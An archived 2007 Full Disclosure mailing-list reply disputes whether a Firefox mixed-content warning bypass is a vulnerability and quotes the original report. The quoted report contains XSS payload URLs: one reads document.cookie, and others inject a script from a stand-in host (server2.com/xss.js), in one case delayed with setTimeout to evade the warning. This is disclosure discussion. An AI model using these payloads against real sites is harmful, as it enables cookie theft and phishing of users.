Full Disclosure mailing list archives
Re: Mozilla Firefox Insecure Element Stealth Injection Vulnerability
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Wed, 4 Apr 2007 19:23:30 +0400
Dear Michal Majchrowicz, This feature is not intended to protect against XSS, it's only intended to inform you some information is transmitted in cleartext. You can simply change src="http://server2.com/xss.js to src="https://server2.com/xss.js to avoid this message. --Wednesday, April 4, 2007, 3:29:14 PM, you wrote to full-disclosure () lists grok org uk: MM> When user visits sites over HTTPS protocol he is informed by the Web MM> Browser everytime the site tries to load unsecured (using HTTP MM> protocol) element (script/iframe/object etc.). MM> So for instance if we have XSS vulnerable site MM> https://server.com/vuln.php?id="><script>alert(document.cookie);</script> MM> Everybrowser will execute it without any complains since they cannot MM> know where the code comes from. But this example will cause a warning: MM> https://server.com/vuln.php?id="><script MM> src="http://server2.com/xss.js"></script> MM> Web Browser knows that we are trying to load something over unsecure protocol. MM> However Mozilla Firefox will fail with the following example and the MM> user will think that all the elements are "safe": MM> https://server.com/vuln.php?id="><script>setTimeout("document.write('<script MM> src=http://server2.com/xss.js></script>',10000)"</script> MM> The "insecure element" will be added after Web Browser performs MM> checking therefore allowing for instance phising attacks. Internet MM> Explorer is not vulnerable to this issue. Other Web Browser weren't MM> tested. MM> _______________________________________________ MM> Full-Disclosure - We believe in it. MM> Charter: http://lists.grok.org.uk/full-disclosure-charter.html MM> Hosted and sponsored by Secunia - http://secunia.com/ -- ~/ZARAZA http://securityvulns.com/ Машина оказалась способной к единственному действию, а именно умножению 2x2, да и то при этом ошибаясь. (Лем) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Mozilla Firefox Insecure Element Stealth Injection Vulnerability Michal Majchrowicz (Apr 04)
- Re: Mozilla Firefox Insecure Element Stealth Injection Vulnerability 3APA3A (Apr 04)